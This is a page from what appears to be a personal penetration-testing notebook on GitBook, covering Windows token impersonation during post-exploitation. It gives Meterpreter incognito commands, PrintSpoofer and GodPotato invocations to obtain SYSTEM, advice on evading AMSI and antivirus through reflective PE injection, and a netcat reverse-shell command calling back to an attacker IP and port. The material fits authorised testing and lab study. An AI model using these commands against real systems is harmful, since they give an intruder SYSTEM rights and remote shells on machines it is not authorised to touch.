🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Meterpreter Incognito
  • SeImpersonatePrivileges
  • PrintSpoofer
  • God Potato (latest one)
  • Other Privileges
  1. Post Exploit
  2. Active Directory

Impersonate Token

PreviousPageNextPivoting

Last updated 6 months ago

Meterpreter Incognito

meterpreter > load incognito

#list all tokens
meterpreter > list_tokens -u

#impersonate token
impersonate_token <complete username>

SeImpersonatePrivileges

If there is antivirus and you able to bypass AMSI, better use Invoke-ReflectivePEInjection to perform printspoofer.exe or godpotato.exe

But the tricky part is when the exe need arguments, so the tips is modified the exe and remove the arguments by directly execute to a revershell or something else.

This meterpreter will make your live easier:

whoami /priv

# SeImpersonatePrivileges

PrintSpoofer

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

.\PrintSpoofer64.exe -i -c cmd

or

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"

God Potato (latest one)

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

reference:

Other Privileges

use this ->

https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session
https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations
LogoGitHub - BeichenDream/GodPotatoGitHub
LogoWindows Privilege Escalation — Token Impersonation(SeImpersonatePrivilege)Medium
LogoGitHub - dievus/printspooferGitHub